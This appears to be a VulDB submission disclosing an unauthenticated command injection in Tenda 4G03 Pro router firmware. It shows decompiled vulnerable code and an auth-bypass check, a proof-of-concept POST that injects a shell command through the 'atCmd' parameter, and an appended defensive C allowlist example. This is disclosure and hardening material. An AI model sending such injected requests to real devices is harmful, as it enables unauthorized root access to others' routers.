| Title | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 OS Command Injection |
|---|---|
| Description | Tenda 4G03 Pro V1.0 /bin/httpd /goform/ate unauthenticated command injection

The /goform/ate endpoint in /usr/sbin/httpd of Tenda 4G03 Pro V1.0
firmware V04.03.01.53 passes the HTTP parameter atCmd directly to
td_common_popen() via snprintf() without sanitization. The
authentication handler FUN_00021a54 explicitly bypasses all security
checks for this endpoint when the admin password is unset, which is
the factory default state. An unauthenticated LAN attacker can
achieve root code execution with a single HTTP POST request.

POC:

Vulnerable code (FUN_000268b4 in /usr/sbin/httpd):

    __s1 = FUN_0001f104(param_1, "atCmd");
    snprintf(acStack_614, 0x1ff, "serial_atcmd at+%s\r", __s1);
    td_common_popen(acStack_614, ...);

Auth bypass (FUN_00021a54):

    if (strncmp(url, "/goform/ate", 0xb) == 0 &&
        DAT_00050f14 == '\0') goto pass_through;

PoC request:

    POST /goform/ate HTTP/1.1
    Host: 192.168.0.1
    Content-Type: application/json

    {"atCmd":"ati; id > /tmp/pwned"} |
| User | CoreNode (UID 96566) |
| Submission | 18.03.2026 03:13 (20 days ago) |
| Moderation | 04.04.2026 08:17 (17 days later) |
| Status | Duplicate |
| VulDB entry | 333199 [Tenda 4G03 Pro up to 04.03.01.44 /usr/sbin/httpd privilege escalation] |
| Points | 0 |
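For contrast with the decompiled snprintf()/td_common_popen() sequence in the description, the following added example (not vendor code and not part of the submission) builds the same command string only after atCmd passes a strict allowlist. The names atcmd_is_safe and build_serial_atcmd, the permitted character set and the 64-byte limit are assumptions; validating the parameter addresses only the injection, and the handler would still need to require authentication.

```c
#include <stdio.h>
#include <string.h>

/* Assumed conservative allowlist for the text after "at+": alphanumerics plus
 * punctuation with no shell or glob meaning. Hypothetical, not vendor code. */
static int atcmd_is_safe(const char *s)
{
    static const char extra[] = "+=,.:_-";
    size_t n;

    if (s == NULL)
        return 0;
    n = strlen(s);
    if (n == 0 || n > 64)               /* assumed bound for one AT command */
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        int alnum = (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
                    (c >= 'a' && c <= 'z');
        if (!alnum && strchr(extra, c) == NULL)
            return 0;                   /* rejects ; | & $ ` space quotes etc. */
    }
    return 1;
}

/* Builds the "serial_atcmd at+<cmd>\r" string shown on the page, but only from
 * validated input. Returns 0 on success, -1 if rejected or truncated. */
int build_serial_atcmd(char *out, size_t outlen, const char *atcmd)
{
    int n;

    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (!atcmd_is_safe(atcmd))
        return -1;
    n = snprintf(out, outlen, "serial_atcmd at+%s\r", atcmd);
    if (n < 0 || (size_t)n >= outlen) { /* never pass a truncated command on */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char cmd[0x1ff];
    /* Constructed inputs; the last is the atCmd value from the page's PoC. */
    const char *samples[] = { "CSQ", "CGDCONT=1", "ati; id > /tmp/pwned" };
    for (size_t i = 0; i < 3; i++)
        printf("%-22s %s\n", samples[i],
               build_serial_atcmd(cmd, sizeof cmd, samples[i]) ? "rejected" : "accepted");
    return 0;
}
```

Where the firmware allows it, writing the AT command to the modem device without a shell removes the injection class entirely; the allowlist is the smaller change when the popen-style helper has to stay.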